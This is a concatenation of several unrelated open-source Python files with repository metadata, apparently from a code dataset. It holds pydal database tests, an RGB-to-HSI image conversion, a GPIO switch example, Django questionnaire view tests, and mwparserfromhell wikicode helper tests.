t1[None] = {"B": int(t0[1]["id"]), "words": blather}
r = db(db.t0.id == db.b.B).select()
self.assertEqual(r[0].b.words, blather)
t1.drop()
t0.drop()
# test field case
try:
t0 = db.define_table("table_is_a_test", Field("a_a"), Field("a_A"))
except Exception as e:
# some db does not support case sensitive field names mysql is one of them.
if DEFAULT_URI.startswith("mysql:") or DEFAULT_URI.startswith("sqlite:"):
db.rollback()
return
if "Column names in each table must be unique" in e.args[1]:
db.rollback()
return
raise e
t0[None] = dict(a_a="a_a", a_A="a_A")
self.assertEqual(t0[1].a_a, "a_a")
self.assertEqual(t0[1].a_A, "a_A")
def testPKFK(self):
# test primary keys
db = self.connect(ignore_field_case=False)
if DEFAULT_URI.startswith("mssql"):
# multiple cascade gotcha
for key in ["reference", "reference FK"]:
db._adapter.types[key] = db._adapter.types[key].replace(
"%(on_delete_action)s", "NO ACTION"
)
# test table without surrogate key. Length must is limited to
# 100 because of MySQL limitations: it cannot handle more than
# 767 bytes in unique keys.
t0 = db.define_table("t0", Field("Code", length=100), primarykey=["Code"])
t2 = db.define_table("t2", Field("f"), Field("t0_Code", "reference t0"))
t3 = db.define_table(
"t3", Field("f", length=100), Field("t0_Code", t0.Code), primarykey=["f"]
)
t4 = db.define_table(
"t4", Field("f", length=100), Field("t0", t0), primarykey=["f"]
)
try:
t5 = db.define_table(
"t5",
Field("f", length=100),
Field("t0", "reference no_table_wrong_reference"),
primarykey=["f"],
)
except Exception as e:
self.assertTrue(isinstance(e, KeyError))
if DEFAULT_URI.startswith("mssql"):
# there's no drop cascade in mssql
t3.drop()
t4.drop()
t2.drop()
t0.drop()
else:
t0.drop("cascade")
t2.drop()
t3.drop()
t4.drop()
def testPKFK2(self):
# test reference to reference
db = self.connect(ignore_field_case=False)
if DEFAULT_URI.startswith("mssql"):
# multiple cascade gotcha
for key in ["reference", "reference FK"]:
db._adapter.types[key] = db._adapter.types[key].replace(
"%(on_delete_action)s", "NO ACTION"
)
t0 = db.define_table("object_", Field("id", "id"))
t1 = db.define_table(
"part", Field("id", "reference object_"), primarykey=["id"]
)
t2 = db.define_table(
"part_rev",
Field("id", "reference object_"),
Field("part", "reference part"),
Field("rev", "integer"),
primarykey=["id"],
)
id = db.object_.insert()
db.part.insert(id=id)
id_rev = db.object_.insert()
db.part_rev.insert(id=id_rev, part=id, rev=0)
result = db(db.part_rev.part == db.part.id).select()
self.assertEqual(len(result), 1)
self.assertEqual(result[0]["part_rev.id"], id_rev)
self.assertEqual(result[0]["part_rev.part"], id)
if DEFAULT_URI.startswith(("mssql", "sqlite")):
# there's no drop cascade in mssql and it seems there is some problem in sqlite
t2.drop()
t1.drop()
t0.drop()
else:
t0.drop("cascade")
t1.drop("cascade")
t2.drop()
class TestTableAndFieldCase(unittest.TestCase):
"""
at the Python level we should not allow db.C and db.c because of .table conflicts on windows
but it should be possible to map two different names into distinct tables "c" and "C" at the Python level
By default Python models names should be mapped into lower case table names and assume case insensitivity.
"""
def testme(self):
return
class TestQuotesByDefault(unittest.TestCase):
"""
all default tables names should be quoted unless an explicit mapping has been given for a table.
"""
def testme(self):
return
class TestGis(DALtest):
@unittest.skipIf(True, "WIP")
def testGeometry(self):
from pydal import geoPoint, geoLine, geoPolygon
if not IS_POSTGRESQL:
return
db = self.connect()
t0 = db.define_table("t0", Field("point", "geometry()"))
t1 = db.define_table("t1", Field("line", "geometry(public, 4326, 2)"))
t2 = db.define_table("t2", Field("polygon", "geometry(public, 4326, 2)"))
t0.insert(point=geoPoint(1, 1))
text = (
db(db.t0.id)
.select(db.t0.point.st_astext())
.first()[db.t0.point.st_astext()]
)
self.assertEqual(text, "POINT(1 1)")
t1.insert(line=geoLine((1, 1), (2, 2)))
text = (
db(db.t1.id).select(db.t1.line.st_astext()).first()[db.t1.line.st_astext()]
)
self.assertEqual(text, "LINESTRING(1 1,2 2)")
t2.insert(polygon=geoPolygon((0, 0), (2, 0), (2, 2), (0, 2), (0, 0)))
text = (
db(db.t2.id)
.select(db.t2.polygon.st_astext())
.first()[db.t2.polygon.st_astext()]
)
self.assertEqual(text, "POLYGON((0 0,2 0,2 2,0 2,0 0))")
query = t0.point.st_intersects(geoLine((0, 0), (2, 2)))
output = db(query).select(db.t0.point).first()[db.t0.point]
self.assertEqual(output, "POINT(1 1)")
query = t2.polygon.st_contains(geoPoint(1, 1))
n = db(query).count()
self.assertEqual(n, 1)
x = t0.point.st_x()
y = t0.point.st_y()
point = db(t0.id).select(x, y).first()
self.assertEqual(point[x], 1)
self.assertEqual(point[y], 1)
@unittest.skipIf(True, "WIP")
def testGeometryCase(self):
from pydal import geoPoint, geoLine, geoPolygon
if not IS_POSTGRESQL:
return
db = self.connect(ignore_field_case=False)
t0 = db.define_table(
"t0", Field("point", "geometry()"), Field("Point", "geometry()")
)
t0.insert(point=geoPoint(1, 1))
t0.insert(Point=geoPoint(2, 2))
@unittest.skipIf(True, "WIP")
def testGisMigration(self):
if not IS_POSTGRESQL:
return
for b in [True, False]:
db = DAL(DEFAULT_URI, check_reserved=["all"], ignore_field_case=b)
t0 = db.define_table(
"t0",
Field("Point", "geometry()"),
Field("rname_point", "geometry()", rname="foo"),
)
db.commit()
db.close()
db = DAL(DEFAULT_URI, check_reserved=["all"], ignore_field_case=b)
t0 = db.define_table("t0", Field("New_point", "geometry()"))
t0.drop()
db.commit()
db.close()
@unittest.skipUnless(IS_POSTGRESQL, "Only implemented for postgres for now")
class TestJSON(DALtest):
def testJSONExpressions(self):
db = self.connect()
if not hasattr(db._adapter.dialect, "json_key"):
return
tj = db.define_table("tj", Field("testjson", "json"))
rec1 = tj.insert(
testjson={
u"a": {u"a1": 2, u"a0": 1},
u"b": 3,
u"c": {u"c0": {u"c01": [2, 4]}},
u"str": "foo",
}
)
rec2 = tj.insert(
testjson={
u"a": {u"a1": 2, u"a0": 2},
u"b": 4,
u"c": {u"c0": {u"c01": [2, 3]}},
u"str": "bar",
}
)
rows = db(db.tj.testjson.json_key("a").json_key_value("a0") == 1).select()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0].id, rec1)
rows = db(db.tj.testjson.json_path_value("{a, a1}") == 2).select()
self.assertEqual(len(rows), 2)
rows = db(db.tj.testjson.json_path_value("{a, a0}") == 2).select()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0].id, rec2)
rows = db(db.tj.testjson.json_path_value(r"{str}") == "foo").select()
self.assertEqual(len(rows), 1)
rows = db(db.tj.testjson.json_contains('{"c": {"c0":{"c01": [2]}}}')).select()
self.assertEqual(len(rows), 2)
rows = db(db.tj.testjson.json_contains('{"c": {"c0":{"c01": [4]}}}')).select()
self.assertEqual(len(rows), 1)
rows = db(db.tj.id > 0).select(
db.tj.testjson.json_path("{c, c0, c01, 0}").with_alias("first")
)
self.assertEqual(rows[0].first, 2)
self.assertEqual(rows[1].first, 2)
class TestSQLCustomType(DALtest):
def testRun(self):
db = self.connect()
from pydal.helpers.classes import SQLCustomType
native_double = "double"
native_string = "string"
if hasattr(db._adapter, "types"):
native_double = db._adapter.types["double"]
native_string = db._adapter.types["string"] % {"length": 256}
basic_t = SQLCustomType(type="double", native=native_double)
basic_t_str = SQLCustomType(type="string", native=native_string)
t0 = db.define_table(
"t0", Field("price", basic_t), Field("product", basic_t_str)
)
r_id = t0.insert(price=None, product=None)
row = db(t0.id == r_id).select(t0.ALL).first()
self.assertEqual(row["price"], None)
self.assertEqual(row["product"], None)
r_id = t0.insert(price=1.2, product="car")
row = db(t0.id == r_id).select(t0.ALL).first()
self.assertEqual(row["price"], 1.2)
self.assertEqual(row["product"], "car")
t0.drop()
import zlib
native = "text"
if IS_ORACLE:
native = "CLOB"
compressed = SQLCustomType(
type="text",
native=native,
encoder=(lambda x: zlib.compress(x or "", 1)),
decoder=(lambda x: zlib.decompress(x)),
)
t1 = db.define_table("t0", Field("cdata", compressed))
# r_id=t1.insert(cdata="car")
# row=db(t1.id == r_id).select(t1.ALL).first()
# self.assertEqual(row['cdata'], "'car'")
class TestLazy(DALtest):
def testRun(self):
db = self.connect(lazy_tables=True)
t0 = db.define_table("t0", Field("name"))
self.assertTrue(("t0" in db._LAZY_TABLES.keys()))
db.t0.insert(name="1")
self.assertFalse(("t0" in db._LAZY_TABLES.keys()))
def testLazyGetter(self):
db = self.connect(check_reserved=None, lazy_tables=True)
db.define_table("tt", Field("value", "integer"))
db.define_table(
"ttt",
Field("value", "integer"),
Field("tt_id", "reference tt"),
)
# Force table definition
db.ttt.value.writable = False
idd = db.tt.insert(value=0)
db.ttt.insert(tt_id=idd)
def testRowNone(self):
db = self.connect(check_reserved=None, lazy_tables=True)
tt = db.define_table("tt", Field("value", "integer"))
db.tt.insert(value=None)
row = db(db.tt).select(db.tt.ALL).first()
self.assertEqual(row.value, None)
self.assertEqual(row[db.tt.value], None)
self.assertEqual(row["tt.value"], None)
self.assertEqual(row.get("tt.value"), None)
self.assertEqual(row["value"], None)
self.assertEqual(row.get("value"), None)
def testRowExtra(self):
db = self.connect(check_reserved=None, lazy_tables=True)
if IS_ORACLE:
# lazy use is difficult in Oracle if using cased (non-upper) fields
tt = db.define_table("tt", Field("VALUE", "integer"))
db.tt.insert(VALUE=1)
else:
tt = db.define_table("tt", Field("value", "integer"))
db.tt.insert(value=1)
row = db(db.tt).select("value").first()
self.assertEqual(row.value, 1)
class TestRedefine(unittest.TestCase):
def testRun(self):
db = DAL(DEFAULT_URI, check_reserved=["all"], lazy_tables=True, migrate=False)
db.define_table("t_a", Field("code"))
self.assertTrue("code" in db.t_a)
self.assertTrue("code" in db["t_a"])
db.define_table("t_a", Field("code_a"), redefine=True)
self.assertFalse("code" in db.t_a)
self.assertFalse("code" in db["t_a"])
self.assertTrue("code_a" in db.t_a)
self.assertTrue("code_a" in db["t_a"])
db.close()
class TestUpdateInsert(DALtest):
def testRun(self):
db = self.connect()
t0 = db.define_table("t0", Field("name"))
i_id = t0.update_or_insert((t0.id == 1), name="web2py")
u_id = t0.update_or_insert((t0.id == i_id), name="web2py2")
self.assertTrue(i_id != None)
self.assertTrue(u_id == None)
self.assertTrue(db(t0).count() == 1)
self.assertTrue(db(t0.name == "web2py").count() == 0)
self.assertTrue(db(t0.name == "web2py2").count() == 1)
class TestBulkInsert(DALtest):
def testRun(self):
db = self.connect()
t0 = db.define_table("t0", Field("name"))
global ctr
ctr = 0
def test_after_insert(i, r):
self.assertIsInstance(i, OpRow)
global ctr
ctr += 1
return True
t0._after_insert.append(test_after_insert)
items = [{"name": "web2py_%s" % pos} for pos in range(0, 10, 1)]
t0.bulk_insert(items)
self.assertTrue(db(t0).count() == len(items))
for pos in range(0, 10, 1):
self.assertTrue(db(t0.name == "web2py_%s" % pos).count() == 1)
self.assertTrue(ctr == len(items))
class TestRecordVersioning(DALtest):
def testRun(self):
db = self.connect()
db.define_table(
"t0",
Field("name"),
Field("is_active", writable=False, readable=False, default=True),
)
db.t0._enable_record_versioning(archive_name="t0_archive")
self.assertTrue("t0_archive" in db)
i_id = db.t0.insert(name="web2py1")
db.t0.insert(name="web2py2")
db(db.t0.name == "web2py2").delete()
self.assertEqual(len(db(db.t0).select()), 1)
self.assertEqual(db(db.t0).count(), 1)
db(db.t0.id == i_id).update(name="web2py3")
self.assertEqual(len(db(db.t0).select()), 1)
self.assertEqual(db(db.t0).count(), 1)
self.assertEqual(len(db(db.t0_archive).select()), 2)
self.assertEqual(db(db.t0_archive).count(), 2)
@unittest.skipIf(IS_SQLITE or IS_NOSQL, "Skip if sqlite or NOSQL since no pools")
class TestConnection(unittest.TestCase):
def testRun(self):
# check connection is no longer active after close
db = DAL(DEFAULT_URI, check_reserved=["all"])
connection = db._adapter.connection
db.close()
if not IS_ORACLE:
# newer Oracle versions no longer play well with explicit .close()
self.assertRaises(Exception, connection.commit)
# check connection are reused with pool_size
connections = set()
for a in range(10):
db2 = DAL(DEFAULT_URI, check_reserved=["all"], pool_size=5)
c = db2._adapter.connection
connections.add(c)
db2.close()
self.assertEqual(len(connections), 1)
c = connections.pop()
c.commit()
c.close()
# check correct use of pool_size
dbs = []
for a in range(10):
db3 = DAL(DEFAULT_URI, check_reserved=["all"], pool_size=5)
# make sure the connection is stablished
db3._adapter.get_connection()
dbs.append(db3)
for db in dbs:
db.close()
self.assertEqual(len(db3._adapter.POOLS[DEFAULT_URI]), 5)
for c in db3._adapter.POOLS[DEFAULT_URI]:
c.close()
db3._adapter.POOLS[DEFAULT_URI] = []
# Clean close if a connection is broken (closed explicity)
if not IS_ORACLE:
for a in range(10):
db4 = DAL(DEFAULT_URI, check_reserved=["all"], pool_size=5)
db4._adapter.connection.close()
db4.close()
self.assertEqual(len(db4._adapter.POOLS[DEFAULT_URI]), 0)
class TestSerializers(DALtest):
def testAsJson(self):
db = self.connect()
db.define_table("tt", Field("date_field", "datetime"))
db.tt.insert(date_field=datetime.datetime.now())
rows = db().select(db.tt.ALL)
j = rows.as_json()
import json # standard library
json.loads(j)
def testSelectIterselect(self):
db = self.connect()
db.define_table("tt", Field("tt"))
db.tt.insert(tt="pydal")
methods = ["as_dict", "as_csv", "as_json", "as_xml", "as_list"]
for method in methods:
rows = db(db.tt).select()
rowsI = db(db.tt).iterselect()
self.assertEqual(
getattr(rows, method)(), getattr(rowsI, method)(), "failed %s" % method
)
class TestIterselect(DALtest):
def testRun(self):
db = self.connect()
t0 = db.define_table("t0", Field("name"))
names = ["web2py", "pydal", "Massimo"]
for n in names:
t0.insert(name=n)
rows = db(db.t0).select(orderby=db.t0.id)
for pos, r in enumerate(rows):
self.assertEqual(r.name, names[pos])
# Testing basic iteration
rows = db(db.t0).iterselect(orderby=db.t0.id)
for pos, r in enumerate(rows):
self.assertEqual(r.name, names[pos])
# Testing IterRows.first before basic iteration
rows = db(db.t0).iterselect(orderby=db.t0.id)
self.assertEqual(rows.first().name, names[0])
self.assertEqual(rows.first().name, names[0])
for pos, r in enumerate(rows):
self.assertEqual(r.name, names[pos])
# Testing IterRows.__nonzero__ before basic iteration
rows = db(db.t0).iterselect(orderby=db.t0.id)
if rows:
for pos, r in enumerate(rows):
self.assertEqual(r.name, names[pos])
# Empty IterRows
rows = db(db.t0.name == "IterRows").iterselect(orderby=db.t0.id)
self.assertEqual(bool(rows), False)
for pos, r in enumerate(rows):
self.assertEqual(r.name, names[pos])
# Testing IterRows.__getitem__
rows = db(db.t0).iterselect(orderby=db.t0.id)
self.assertEqual(rows[0].name, names[0])
self.assertEqual(rows[1].name, names[1])
# recall the same item
self.assertEqual(rows[1].name, names[1])
self.assertEqual(rows[2].name, names[2])
self.assertRaises(IndexError, rows.__getitem__, 1)
# Testing IterRows.next()
rows = db(db.t0).iterselect(orderby=db.t0.id)
for n in names:
self.assertEqual(next(rows).name, n)
self.assertRaises(StopIteration, next, rows)
# Testing IterRows.compact
rows = db(db.t0).iterselect(orderby=db.t0.id)
rows.compact = False
for n in names:
self.assertEqual(next(rows).t0.name, n)
@unittest.skipIf(IS_MSSQL, "Skip mssql")
def testMultiSelect(self):
# Iterselect holds the cursors until all elemets have been evaluated
# inner queries use new cursors
db = self.connect()
t0 = db.define_table("t0", Field("name"), Field("name_copy"))
db(db.t0).delete()
db.commit()
names = ["web2py", "pydal", "Massimo"]
for n in names:
t0.insert(name=n)
c = 0
for r in db(db.t0).iterselect():
db.t0.update_or_insert(db.t0.id == r.id, name_copy=r.name)
c += 1
self.assertEqual(c, len(names), "The iterator is not looping over all elements")
self.assertEqual(db(db.t0).count(), len(names))
c = 0
for x in db(db.t0).iterselect(orderby=db.t0.id):
for y in db(db.t0).iterselect(orderby=db.t0.id):
db.t0.update_or_insert(db.t0.id == x.id, name_copy=x.name)
c += 1
self.assertEqual(c, len(names) * len(names))
self.assertEqual(db(db.t0).count(), len(names))
db._adapter.test_connection()
@unittest.skipIf(IS_SQLITE | IS_MSSQL, "Skip sqlite & ms sql")
def testMultiSelectWithCommit(self):
db = self.connect()
t0 = db.define_table("t0", Field("nn", "integer"))
for n in xrange(1, 100, 1):
t0.insert(nn=n)
db.commit()
s = db.t0.nn.sum()
tot = db(db.t0).select(s).first()[s]
c = 0
for r in db(db.t0).iterselect(db.t0.ALL):
db.t0.update_or_insert(db.t0.id == r.id, nn=r.nn * 2)
db.commit()
c += 1
self.assertEqual(c, db(db.t0).count())
self.assertEqual(tot * 2, db(db.t0).select(s).first()[s])
db._adapter.test_connection()
if __name__ == "__main__":
unittest.main()
tearDownModule()
|
web2py/pydal
|
tests/sql.py
|
Python
|
bsd-3-clause
| 137,514 | 0.001136 |
"""Placeholder."""
import numpy as np
def rgb_to_hsi(im):
"""Convert to HSI the RGB pixels in im.
Adapted from
https://en.wikipedia.org/wiki/HSL_and_HSV#Hue_and_chroma.
"""
im = np.moveaxis(im, -1, 0)
if len(im) not in (3, 4):
raise ValueError("Expected 3-channel RGB or 4-channel RGBA image;"
" received a {}-channel image".format(len(im)))
im = im[:3]
hues = (np.arctan2(3**0.5 * (im[1] - im[2]),
2 * im[0] - im[1] - im[2]) / (2 * np.pi)) % 1
intensities = im.mean(0)
saturations = np.where(
intensities, 1 - im.min(0) / np.maximum(intensities, 1e-10), 0)
return np.stack([hues, saturations, intensities], -1)
|
DigitalSlideArchive/HistomicsTK
|
histomicstk/preprocessing/color_conversion/rgb_to_hsi.py
|
Python
|
apache-2.0
| 725 | 0 |
import LNdigitalIO
def switch_pressed(event):
event.chip.output_pins[event.pin_num].turn_on()
def switch_unpressed(event):
event.chip.output_pins[event.pin_num].turn_off()
if __name__ == "__main__":
LNdigital = LNdigitalIO.LNdigitals()
listener = LNdigitalIO.InputEventListener(chip=LNdigital)
for i in range(4):
listener.register(i, LNdigitalIO.IODIR_ON, switch_pressed)
listener.register(i, LNdigitalIO.IODIR_OFF, switch_unpressed)
listener.activate()
|
LeMaker/LNdigitalIO
|
examples/presslights.py
|
Python
|
gpl-3.0
| 501 | 0 |
from urllib import quote
from django.test import Client
from questionnaire.forms.assign_question import AssignQuestionForm
from questionnaire.models import Questionnaire, Section, SubSection, Question, Region, QuestionGroup
from questionnaire.models.skip_rule import SkipQuestion
from questionnaire.tests.base_test import BaseTest
from questionnaire.tests.factories.question_group_factory import QuestionGroupFactory
from questionnaire.tests.factories.skip_rule_factory import SkipQuestionRuleFactory, SkipSubsectionRuleFactory
class AssignQuestionViewTest(BaseTest):
def setUp(self):
self.client = Client()
self.user = self.create_user(org="WHO")
self.region = None
self.assign('can_edit_questionnaire', self.user)
self.client.login(username=self.user.username, password='pass')
self.questionnaire = Questionnaire.objects.create(name="JRF 2013 Core English", year=2013, region=self.region)
self.section = Section.objects.create(name="section", questionnaire=self.questionnaire, order=1)
self.subsection = SubSection.objects.create(title="subsection 1", section=self.section, order=1)
self.question1 = Question.objects.create(text='Q1', UID='C00003', answer_type='Number', region=self.region)
self.question2 = Question.objects.create(text='Q2', UID='C00002', answer_type='Number', region=self.region)
self.form_data = {'questions': [self.question1.id, self.question2.id]}
self.url = '/subsection/%d/assign_questions/' % self.subsection.id
def test_get_assign_question_page(self):
response = self.client.get(self.url)
self.assertEqual(200, response.status_code)
templates = [template.name for template in response.templates]
self.assertIn('questionnaires/assign_questions.html', templates)
def test_gets_assign_questions_form_and_subsection_in_context(self):
afro = Region.objects.create(name="Afro")
question_in_region = Question.objects.create(text='not in Region Q', UID='C000R3', answer_type='Number',
region=afro)
response = self.client.get(self.url)
self.assertIsInstance(response.context['assign_question_form'], AssignQuestionForm)
self.assertEqual(2, response.context['questions'].count())
questions_texts = [question.text for question in list(response.context['questions'])]
self.assertIn(self.question1.text, questions_texts)
self.assertIn(self.question2.text, questions_texts)
self.assertNotIn(question_in_region.text, questions_texts)
self.assertEqual('Done', response.context['btn_label'])
def test_GET_puts_list_of_already_used_questions_in_context(self):
question1 = Question.objects.create(text='USed question', UID='C00033', answer_type='Number',
region=self.region)
question1.question_group.create(subsection=self.subsection)
response = self.client.get(self.url)
self.assertEqual(1, len(response.context['active_questions']))
self.assertIn(question1, response.context['active_questions'])
self.assertIn(question1, response.context['questions'])
def test_GET_does_not_put_parent_questions_in_the_context(self):
parent_question = Question.objects.create(text='parent q', UID='C000R3', answer_type='Number')
self.question1.parent = parent_question
self.question1.save()
used_question1 = Question.objects.create(text='USed question', UID='C00033', answer_type='Number',
region=self.region, parent=parent_question)
used_question1.question_group.create(subsection=self.subsection)
response = self.client.get(self.url)
self.assertEqual(3, response.context['questions'].count())
questions_texts = [question.text for question in list(response.context['questions'])]
self.assertIn(self.question1.text, questions_texts)
self.assertIn(self.question2.text, questions_texts)
self.assertIn(used_question1.text, questions_texts)
self.assertNotIn(parent_question.text, questions_texts)
self.assertEqual(1, len(response.context['active_questions']))
self.assertIn(used_question1, response.context['active_questions'])
def test_post_questions_assigns_them_to_subsections_and_get_or_create_group(self):
self.failIf(self.question1.question_group.all())
self.failIf(self.question2.question_group.all())
meta = {'HTTP_REFERER': self.url}
response = self.client.post(self.url, data={'questions': [self.question1.id, self.question2.id]}, **meta)
question_group = self.question1.question_group.all()
self.assertEqual(1, question_group.count())
self.assertEqual(question_group[0], self.question2.question_group.all()[0])
self.assertEqual(self.subsection, question_group[0].subsection)
def test_successful_post_redirect_to_referer_url(self):
meta = {'HTTP_REFERER': self.url}
response = self.client.post(self.url, data={'questions': [self.question1.id, self.question2.id]}, **meta)
self.assertRedirects(response, self.url)
def test_successful_post_display_success_message(self):
referer_url = '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)
meta = {'HTTP_REFERER': referer_url}
response = self.client.post(self.url, data={'questions': [self.question1.id, self.question2.id]}, **meta)
message = "Questions successfully assigned to questionnaire."
self.assertIn(message, response.cookies['messages'].value)
def test_with_errors_returns_the_form_with_error(self):
referer_url = '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)
meta = {'HTTP_REFERER': referer_url}
response = self.client.post(self.url, data={'questions': []}, **meta)
self.assertIsInstance(response.context['assign_question_form'], AssignQuestionForm)
self.assertIn("This field is required.", response.context['assign_question_form'].errors['questions'])
self.assertEqual(2, response.context['questions'].count())
questions_texts = [question.text for question in list(response.context['questions'])]
self.assertIn(self.question1.text, questions_texts)
self.assertIn(self.question2.text, questions_texts)
self.assertEqual('Done', response.context['btn_label'])
def test_login_required(self):
self.assert_login_required(self.url)
def test_permission_required_for_create_section(self):
self.assert_permission_required(self.url)
user_not_in_same_region = self.create_user(username="asian_chic", group=self.REGIONAL_ADMIN, region="ASEAN",
org="WHO")
self.assign('can_edit_questionnaire', user_not_in_same_region)
self.client.logout()
self.client.login(username='asian_chic', password='pass')
response = self.client.get(self.url)
self.assertRedirects(response, expected_url='/accounts/login/?next=%s' % quote(self.url))
response = self.client.post(self.url)
self.assertRedirects(response, expected_url='/accounts/login/?next=%s' % quote(self.url))
def test_GET_with_hide_param_puts_list_of_only_unused_questions_in_context(self):
question1 = Question.objects.create(text='USed question', UID='C00033', answer_type='Number',
region=self.region)
question1.question_group.create(subsection=self.subsection)
hide_url = '/subsection/%d/assign_questions/?hide=1' % self.subsection.id
response = self.client.get(hide_url)
self.assertIn(question1, response.context['active_questions'])
self.assertNotIn(question1, response.context['questions'])
class UnAssignQuestionViewTest(BaseTest):
def setUp(self):
self.client = Client()
self.user = self.create_user(org="WHO")
self.assign('can_edit_questionnaire', self.user)
self.client.login(username=self.user.username, password='pass')
self.questionnaire = Questionnaire.objects.create(name="JRF 2013 Core English", year=2013, region=None)
self.section = Section.objects.create(name="section", questionnaire=self.questionnaire, order=1)
self.subsection = SubSection.objects.create(title="subsection 1", section=self.section, order=1)
self.question1 = Question.objects.create(text='Q1', UID='C00003', answer_type='Number', region=None)
self.question2 = Question.objects.create(text='Q2', UID='C00002', answer_type='Number', region=None)
self.question_group = self.question1.question_group.create(subsection=self.subsection, order=1)
self.question1.orders.create(question_group=self.question_group, order=1)
self.question_group.question.add(self.question2)
self.question2.orders.create(question_group=self.question_group, order=2)
self.url = '/subsection/%d/question/%d/unassign/' % (self.subsection.id, self.question1.id)
def test_post_unassign_question_to_group_and_removes_question_order(self):
meta = {'HTTP_REFERER': '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)}
response = self.client.post(self.url, {}, **meta)
group_questions = self.question_group.question.all()
self.assertNotIn(self.question1, group_questions)
self.assertEqual(0, self.question1.orders.all().count())
def test_successful_post_redirect_to_referer_url(self):
referer_url = '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)
meta = {'HTTP_REFERER': referer_url}
response = self.client.post(self.url, data={}, **meta)
self.assertRedirects(response, referer_url)
def test_successful_post_display_success_message(self):
referer_url = '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)
meta = {'HTTP_REFERER': referer_url}
response = self.client.post(self.url, data={}, **meta)
message = "Question successfully unassigned from questionnaire."
self.assertIn(message, response.cookies['messages'].value)
def test_login_required(self):
self.assert_login_required(self.url)
def test_permission_required_for_create_section(self):
self.assert_permission_required(self.url)
user_not_in_same_region = self.create_user(username="asian_chic", group=self.REGIONAL_ADMIN, region="ASEAN",
org="WHO")
self.assign('can_edit_questionnaire', user_not_in_same_region)
self.client.logout()
self.client.login(username='asian_chic', password='pass')
response = self.client.post(self.url)
self.assertRedirects(response, expected_url='/accounts/login/?next=%s' % quote(self.url))
def test_permission_denied_if_subsection_belongs_to_a_user_but_question_to_another_user(self):
afro = Region.objects.create(name="Afro")
core_question = Question.objects.create(text='core Q', UID='C000C2', answer_type='Number', region=afro)
self.question_group.question.add(core_question)
url = '/subsection/%d/question/%d/unassign/' % (self.subsection.id, core_question.id)
response = self.client.post(url)
self.assertRedirects(response, expected_url='/accounts/login/?next=%s' % quote(url))
def test_deletes_skip_rules_when_unassigning_the_root_question(self):
SkipQuestionRuleFactory(subsection=self.subsection,root_question=self.question1, skip_question=self.question2)
meta = {'HTTP_REFERER': '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)}
self.client.post(self.url, {}, **meta)
self.assertEqual(len(SkipQuestion.objects.all()), 0)
def test_deletes_skip_rules_when_unassigning_the_skip_question(self):
SkipQuestionRuleFactory(subsection=self.subsection,root_question=self.question2, skip_question=self.question1)
meta = {'HTTP_REFERER': '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)}
self.client.post(self.url, {}, **meta)
self.assertEqual(len(SkipQuestion.objects.all()), 0)
def test_deletes_skip_rules_and_empty_groups_when_unassigning_the_root_question_to_skip_subsection(self):
SkipSubsectionRuleFactory(subsection=self.subsection, root_question=self.question1)
order = self.question_group.order + 1
QuestionGroupFactory(subsection=self.subsection, order=order)
meta = {'HTTP_REFERER': '/questionnaire/entry/%d/section/%d/' % (self.questionnaire.id, self.section.id)}
self.client.post(self.url, {}, **meta)
self.assertEqual(SkipQuestion.objects.count(), 0)
self.assertEqual(QuestionGroup.objects.count(), 1)
|
eJRF/ejrf
|
questionnaire/tests/views/test_assign_questions_view.py
|
Python
|
bsd-3-clause
| 13,049 | 0.004598 |
#! /usr/bin/env python3
import mwparserfromhell
from ws.parser_helpers.wikicode import *
class test_get_adjacent_node:
def test_basic(self):
snippet = "[[Arch Linux]] is the best!"
wikicode = mwparserfromhell.parse(snippet)
first = wikicode.get(0)
last = get_adjacent_node(wikicode, first)
assert str(last) == " is the best!"
def test_last_node(self):
snippet = "[[Arch Linux]] is the best!"
wikicode = mwparserfromhell.parse(snippet)
last = get_adjacent_node(wikicode, " is the best!")
assert last == None
def test_whitespace_preserved(self):
snippet = "[[Arch Linux]] \t\n is the best!"
wikicode = mwparserfromhell.parse(snippet)
first = wikicode.get(0)
last = get_adjacent_node(wikicode, first, ignore_whitespace=True)
assert str(last) == " \t\n is the best!"
def test_ignore_whitespace(self):
snippet = "[[Arch Linux]] \t\n [[link]] is the best!"
wikicode = mwparserfromhell.parse(snippet)
first = wikicode.get(0)
wikicode.remove("[[link]]")
last = get_adjacent_node(wikicode, first, ignore_whitespace=True)
assert str(last) == " is the best!"
class test_get_parent_wikicode:
snippet = """\
{{Note|This [[wikipedia:reference]] is to be noted.}}
Some other text.
"""
wikicode = mwparserfromhell.parse(snippet)
def test_toplevel(self):
parent = get_parent_wikicode(self.wikicode, self.wikicode.get(0))
assert str(parent) == self.snippet
def test_nested(self):
note = self.wikicode.filter_templates()[0]
link = self.wikicode.filter_wikilinks()[0]
parent = get_parent_wikicode(self.wikicode, link)
assert str(parent) == str(note.params[0])
class test_remove_and_squash:
@staticmethod
def _do_test(wikicode, remove, expected):
node = wikicode.get(wikicode.index(remove))
remove_and_squash(wikicode, node)
assert str(wikicode) == expected
def test_inside(self):
snippet = "Some text with a [[link]] inside."
expected = "Some text with a inside."
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link]]", expected)
def test_around(self):
snippet = """\
First paragraph
[[link1]]
Second paragraph
[[link2]]
Third paragraph
"""
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link1]]", "First paragraph\n\nSecond paragraph\n[[link2]]\n\nThird paragraph\n")
self._do_test(wikicode, "[[link2]]", "First paragraph\n\nSecond paragraph\n\nThird paragraph\n")
def test_lineend(self):
snippet = """\
Some other text [[link]]
Following sentence.
"""
expected = """\
Some other text
Following sentence.
"""
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link]]", expected)
def test_linestart(self):
snippet = """\
Another paragraph.
[[link]] some other text.
"""
expected = """\
Another paragraph.
some other text.
"""
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link]]", expected)
def test_lineend_twolinks(self):
snippet = """\
Some other text [[link1]][[link2]]
Following sentence.
"""
expected = """\
Some other text [[link1]]
Following sentence.
"""
wikicode = mwparserfromhell.parse(snippet)
self._do_test(wikicode, "[[link2]]", expected)
